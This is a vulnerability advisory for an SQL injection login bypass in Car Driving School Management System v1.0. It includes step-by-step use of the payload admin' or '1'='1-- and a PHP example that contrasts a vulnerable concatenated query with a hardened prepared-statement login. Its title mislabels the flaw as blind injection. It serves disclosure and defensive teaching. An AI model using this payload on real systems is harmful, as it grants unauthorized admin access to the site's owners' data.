CVE-2022-24571: OpenSource/exploit_sql at main · nsparker1337/OpenSource

Car Driving School Management System v1.0 is affected by SQL injection in the login page. An attacker can use a simple SQL login injection payload to get admin access.


# Exploit Title: Car Driving School management System v1.0 - Unauthenticated Blind SQL Injection

# Exploit Author: NS Kumar (n1_x)

# Date: January 31, 2022

# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms_1.zip

# Tested on: Parrot Linux, Apache, MySQL

# Vendor: oretnom23

# Version: v1.0

# Exploit Description:

# Car Driving School management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to gain admin access.

# To Exploit:

Step 1: Go to the login page.

Step 2: Enter the payload admin' or '1'='1-- and leave the password field blank, then click the Login button.

Step 3: You can now access the admin dashboard.
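The flaw and its fix side by side, as an added example that is not the application's code or the exploit author's. It assumes a `users` table, a login query built by string concatenation, and that the Step 2 value goes into the username field; an in-memory SQLite database via PDO stands in for MySQL so the script runs offline.

```php
<?php
// Added example. Schema, column and function names are assumptions, not the
// application's code. In-memory SQLite via PDO stands in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// password_md5: unsalted hash compared inside the query (assumed legacy design).
// password_hash: salted hash that is verified in PHP by the hardened login.
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_md5 TEXT, password_hash TEXT)');

// Constructed sample account.
$pw = 'constructed-sample-pw';
$seed = $pdo->prepare('INSERT INTO users VALUES (?, ?, ?)');
$seed->execute(['admin', md5($pw), password_hash($pw, PASSWORD_DEFAULT)]);

// Vulnerable pattern: request values are concatenated into the SQL text, so a
// quote in the username ends the string literal and the rest is parsed as SQL.
function login_vulnerable(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT username FROM users WHERE username = '$username' "
         . "AND password_md5 = '" . md5($password) . "'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened pattern: the username is bound as data, never parsed as SQL, and the
// password is checked in PHP against a salted hash instead of in the WHERE clause.
function login_hardened(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// The Step 2 value (assumed to be the username), then a valid and an invalid login.
$payload = "admin' or '1'='1--";
foreach ([[$payload, ''], ['admin', $pw], ['admin', 'wrong']] as [$u, $p]) {
    printf("%-22s vulnerable=%s hardened=%s\n", $u,
        var_export(login_vulnerable($pdo, $u, $p), true),
        var_export(login_hardened($pdo, $u, $p), true));
}
```

With the concatenated query, the `or` splits the WHERE clause so that the username match alone satisfies it and the password comparison is never required; with the bound parameter, the whole string is looked up as a username and matches no row.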
